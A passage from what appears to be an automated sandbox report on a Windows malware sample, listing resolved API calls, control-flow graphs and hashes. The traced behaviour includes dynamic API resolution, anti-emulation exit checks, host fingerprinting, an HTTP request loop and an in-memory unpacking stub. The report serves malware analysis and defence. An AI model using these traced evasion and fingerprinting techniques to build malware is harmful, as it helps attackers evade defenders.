                                  • GetProcAddress.KERNEL32(75A50000,00856218), ref: 0041A3CB
                                  • GetProcAddress.KERNEL32(75A50000,00856258), ref: 0041A3E4
                                  • GetProcAddress.KERNEL32(75A50000,0088A3C0), ref: 0041A3FC
                                  • GetProcAddress.KERNEL32(75A50000,0088A390), ref: 0041A414
                                  • GetProcAddress.KERNEL32(75070000,00856238), ref: 0041A436
                                  • GetProcAddress.KERNEL32(75070000,0088A858), ref: 0041A44E
                                  • GetProcAddress.KERNEL32(75070000,0088A9C0), ref: 0041A466
                                  • GetProcAddress.KERNEL32(75070000,0088A870), ref: 0041A47F
                                  • GetProcAddress.KERNEL32(75070000,0088A840), ref: 0041A497
                                  • GetProcAddress.KERNEL32(74E50000,00856278), ref: 0041A4B8
                                  • GetProcAddress.KERNEL32(74E50000,00856058), ref: 0041A4D1
                                  • GetProcAddress.KERNEL32(75320000,00856298), ref: 0041A4F2
                                  • GetProcAddress.KERNEL32(75320000,0088A948), ref: 0041A50A
                                  • GetProcAddress.KERNEL32(6F060000,008560D8), ref: 0041A530
                                  • GetProcAddress.KERNEL32(6F060000,00856078), ref: 0041A548
                                  • GetProcAddress.KERNEL32(6F060000,008562B8), ref: 0041A560
                                  • GetProcAddress.KERNEL32(6F060000,0088A888), ref: 0041A579
                                  • GetProcAddress.KERNEL32(6F060000,008562D8), ref: 0041A591
                                  • GetProcAddress.KERNEL32(6F060000,008560F8), ref: 0041A5A9
                                  • GetProcAddress.KERNEL32(6F060000,00856178), ref: 0041A5C2
                                  • GetProcAddress.KERNEL32(6F060000,008562F8), ref: 0041A5DA
                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A5F1
                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A607
                                  • GetProcAddress.KERNEL32(74E00000,0088AA38), ref: 0041A629
                                  • GetProcAddress.KERNEL32(74E00000,008836D0), ref: 0041A641
                                  • GetProcAddress.KERNEL32(74E00000,0088A900), ref: 0041A659
                                  • GetProcAddress.KERNEL32(74E00000,0088A828), ref: 0041A672
                                  • GetProcAddress.KERNEL32(74DF0000,00856098), ref: 0041A693
                                  • GetProcAddress.KERNEL32(6FAB0000,0088A810), ref: 0041A6B4
                                  • GetProcAddress.KERNEL32(6FAB0000,00856318), ref: 0041A6CD
                                  • GetProcAddress.KERNEL32(6FAB0000,0088A978), ref: 0041A6E5
                                  • GetProcAddress.KERNEL32(6FAB0000,0088A8A0), ref: 0041A6FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                  • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                  • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                  • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                  Control-flow Graph

                                  control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1030 406528-40652d 1010->1030 1013 406348-40634c 1011->1013 1014 4064ff-406503 InternetCloseHandle 1011->1014 1016 40635a 1013->1016 1017 40634e-406358 1013->1017 1014->1010 1019 406364-406392 HttpOpenRequestA 1016->1019 1017->1019 1021 4064f5-4064f9 InternetCloseHandle 1019->1021 1022 406398-40639c 1019->1022 1021->1014 1023 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1022->1023 1024 40639e-4063bf InternetSetOptionA 1022->1024 1026 406407-406427 call 41a740 call 41a800 * 2 1023->1026 1027 40642c-40644b call 418940 1023->1027 1024->1023 1026->1030 1035 4064c9-4064e9 call 41a740 call 41a800 * 2 1027->1035 1036 40644d-406454 1027->1036 1035->1030 1039 406456-406480 InternetReadFile 1036->1039 1040 4064c7-4064ef InternetCloseHandle 1036->1040 1044 406482-406489 1039->1044 1045 40648b 1039->1045 1040->1021 1044->1045 1048 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1044->1048 1045->1040 1048->1039
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                  • StrCmpCA.SHLWAPI(?,0088C4D8), ref: 00406303
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0088BFB8,00000000,00000000,00400100,00000000), ref: 00406385
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                  • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                  • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                  • InternetCloseHandle.WININET(00000000), ref: 00406503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3074848878-2509457195
                                  • Opcode ID: c8a6f04fdac549dd7e3b25e171be04d87dad98b8dac672af1d85c5c8f489a90f
                                  • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                  • Opcode Fuzzy Hash: c8a6f04fdac549dd7e3b25e171be04d87dad98b8dac672af1d85c5c8f489a90f
                                  • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                  Control-flow Graph

                                  control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1069 411817-41181a 1067->1069 1070 41199e-4119bd strtok_s 1067->1070 1072 411821-411830 call 41a820 1069->1072 1073 411849-411858 call 41a820 1069->1073 1074 4118ad-4118be StrCmpCA 1069->1074 1075 4118cf-4118e0 StrCmpCA 1069->1075 1076 41198f-411999 call 41a820 1069->1076 1077 4118f1-411902 StrCmpCA 1069->1077 1078 411951-411962 StrCmpCA 1069->1078 1079 411970-411981 StrCmpCA 1069->1079 1080 411913-411924 StrCmpCA 1069->1080 1081 411932-411943 StrCmpCA 1069->1081 1082 411835-411844 call 41a820 1069->1082 1083 41185d-41186e StrCmpCA 1069->1083 1084 41187f-411890 StrCmpCA 1069->1084 1070->1065 1072->1070 1073->1070 1095 4118c0-4118c3 1074->1095 1096 4118ca 1074->1096 1097 4118e2-4118e5 1075->1097 1098 4118ec 1075->1098 1076->1070 1099 411904-411907 1077->1099 1100 41190e 1077->1100 1105 411964-411967 1078->1105 1106 41196e 1078->1106 1086 411983-411986 1079->1086 1087 41198d 1079->1087 1101 411930 1080->1101 1102 411926-411929 1080->1102 1103 411945-411948 1081->1103 1104 41194f 1081->1104 1082->1070 1091 411870-411873 1083->1091 1092 41187a 1083->1092 1093 411892-41189c 1084->1093 1094 41189e-4118a1 1084->1094 1086->1087 1087->1070 1091->1092 1092->1070 1110 4118a8 1093->1110 1094->1110 1095->1096 1096->1070 1097->1098 1098->1070 1099->1100 1100->1070 1101->1070 1102->1101 1103->1104 1104->1070 1105->1106 1106->1070 1110->1070
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcessstrtok_s
                                  • String ID: block
                                  • API String ID: 3407564107-2199623458
                                  • Opcode ID: b3dd8198764fe9467e4b2c8b9506a85e5c70b97dc7c09ae6ead8ebf8a0dcb198
                                  • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                  • Opcode Fuzzy Hash: b3dd8198764fe9467e4b2c8b9506a85e5c70b97dc7c09ae6ead8ebf8a0dcb198
                                  • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                  Control-flow Graph

                                  control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1145 4155bb-4155d2 call 41a8a0 call 41a800 1128->1145 1155 415693-4156a9 call 41aad0 StrCmpCA 1129->1155 1159 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1159 1145->1155 1160 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1155->1160 1161 4156af-4156b6 1155->1161 1159->1155 1291 415ac3-415ac6 1160->1291 1164 4157da-41585f call 41aad0 StrCmpCA 1161->1164 1165 4156bc-4156c3 1161->1165 1184 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1164->1184 1185 415865-41586c 1164->1185 1170 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1165->1170 1171 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1165->1171 1170->1164 1171->1164 1271 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1171->1271 1184->1291 1192 415872-415879 1185->1192 1193 41598f-415a14 call 41aad0 StrCmpCA 1185->1193 1200 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1192->1200 1201 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1192->1201 1222 415a16-415a21 Sleep 1193->1222 1223 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1193->1223 1200->1193 1296 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1200->1296 1201->1193 1222->1127 1223->1291 1271->1164 1296->1193
                                  APIs
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00883680,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                    • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                    • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                  • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleepstrtok
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3630751533-2791005934
                                  • Opcode ID: 497b44604cdb86425a2f1df15548df3ba7e7c57ddf51101f201cba8e249eba1a
                                  • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                  • Opcode Fuzzy Hash: 497b44604cdb86425a2f1df15548df3ba7e7c57ddf51101f201cba8e249eba1a
                                  • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                  Control-flow Graph

                                  control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 417619-417626 call 41a740 1333->1335 1336 417628-417658 wsprintfA call 41a740 1333->1336 1343 41767e-41768e 1335->1343 1336->1343
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                  • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                  • wsprintfA.USER32 ref: 00417640
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\
                                  • API String ID: 3790021787-3809124531
                                  • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                  • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                  • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                  • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                  Control-flow Graph

control_flow_graph 1344 22e003c-22e0047 1345 22e004c-22e0263 call 22e0a3f call 22e0e0f call 22e0d90 VirtualAlloc 1344->1345 1346 22e0049 1344->1346 1361 22e028b-22e0292 1345->1361 1362 22e0265-22e0289 call 22e0a69 1345->1362 1346->1345 1364 22e02a1-22e02b0 1361->1364 1366 22e02ce-22e03c2 VirtualProtect call 22e0cce call 22e0ce7 1362->1366 1364->1366 1367 22e02b2-22e02cc 1364->1367 1373 22e03d1-22e03e0 1366->1373 1367->1364 1374 22e0439-22e04b8 VirtualFree 1373->1374 1375 22e03e2-22e0437 call 22e0ce7 1373->1375 1377 22e04be-22e04cd 1374->1377 1378 22e05f4-22e05fe 1374->1378 1375->1373 1380 22e04d3-22e04dd 1377->1380 1381 22e077f-22e0789 1378->1381 1382 22e0604-22e060d 1378->1382 1380->1378 1386 22e04e3-22e0505 LoadLibraryA 1380->1386 1384 22e078b-22e07a3 1381->1384 1385 22e07a6-22e07b0 1381->1385 1382->1381 1387 22e0613-22e0637 1382->1387 1384->1385 1388 22e086e-22e08be LoadLibraryA 1385->1388 1389 22e07b6-22e07cb 1385->1389 1390 22e0517-22e0520 1386->1390 1391 22e0507-22e0515 1386->1391 1392 22e063e-22e0648 1387->1392 1396 22e08c7-22e08f9 1388->1396 1393 22e07d2-22e07d5 1389->1393 1394 22e0526-22e0547 1390->1394 1391->1394 1392->1381 1395 22e064e-22e065a 1392->1395 1397 22e07d7-22e07e0 1393->1397 1398 22e0824-22e0833 1393->1398 1399 22e054d-22e0550 1394->1399 1395->1381 1400 22e0660-22e066a 1395->1400 1402 22e08fb-22e0901 1396->1402 1403 22e0902-22e091d 1396->1403 1404 22e07e4-22e0822 1397->1404 1405 22e07e2 1397->1405 1401 22e0839-22e083c 1398->1401 1406 22e0556-22e056b 1399->1406 1407 22e05e0-22e05ef 1399->1407 1408 22e067a-22e0689 1400->1408 1401->1388 1409 22e083e-22e0847 1401->1409 1402->1403 1404->1393 1405->1398 1412 22e056f-22e057a 1406->1412 1413 22e056d 1406->1413 1407->1380 1410 22e068f-22e06b2 1408->1410 1411 22e0750-22e077a 1408->1411 1416 22e084b-22e086c 1409->1416 1417 22e0849 1409->1417 1418 22e06ef-22e06fc 1410->1418 1419 22e06b4-22e06ed 1410->1419 1411->1392 1414 22e057c-22e0599 1412->1414 1415 22e059b-22e05bb 1412->1415 1413->1407 1427 22e05bd-22e05db 1414->1427 1415->1427 1416->1401 1417->1388 1421 22e06fe-22e0748 1418->1421 1422 22e074b 1418->1422 1419->1418 1421->1422 1422->1408 1427->1399
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 022E024D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID: cess$kernel32.dll
                                  • API String ID: 4275171209-1230238691
                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                  • Instruction ID: bc7de75c7c9427a50a3ef4041c81cc4394aa9b353f4eb711bf1bfea546b9a28d
                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                  • Instruction Fuzzy Hash: 93527A74A10229DFDB64CF98C984BACBBB1BF09304F5480D9E50EAB355DB70AA85DF14

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008587A0), ref: 004198A1
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008587B8), ref: 004198BA
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00858860), ref: 004198D2
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008588A8), ref: 004198EA
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008587D0), ref: 00419903
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00883690), ref: 0041991B
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00856478), ref: 00419933
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00856658), ref: 0041994C
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00858908), ref: 00419964
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00858830), ref: 0041997C
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00883A98), ref: 00419995
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008838D0), ref: 004199AD
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,008564F8), ref: 004199C5
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00883AB0), ref: 004199DE
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                    • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                    • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                    • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                    • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                    • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                    • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                    • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                    • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                  • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                    • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00883680,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                  • CloseHandle.KERNEL32(?,00000000,?,00883680,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                  • ExitProcess.KERNEL32 ref: 00416B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 3511611419-0
                                  • Opcode ID: f2837a91539e1de850f1597d3128a2fe060ecc5e52c57b00c57f058d9a125bb9
                                  • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                  • Opcode Fuzzy Hash: f2837a91539e1de850f1597d3128a2fe060ecc5e52c57b00c57f058d9a125bb9
                                  • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                  Control-flow Graph

                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                  • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
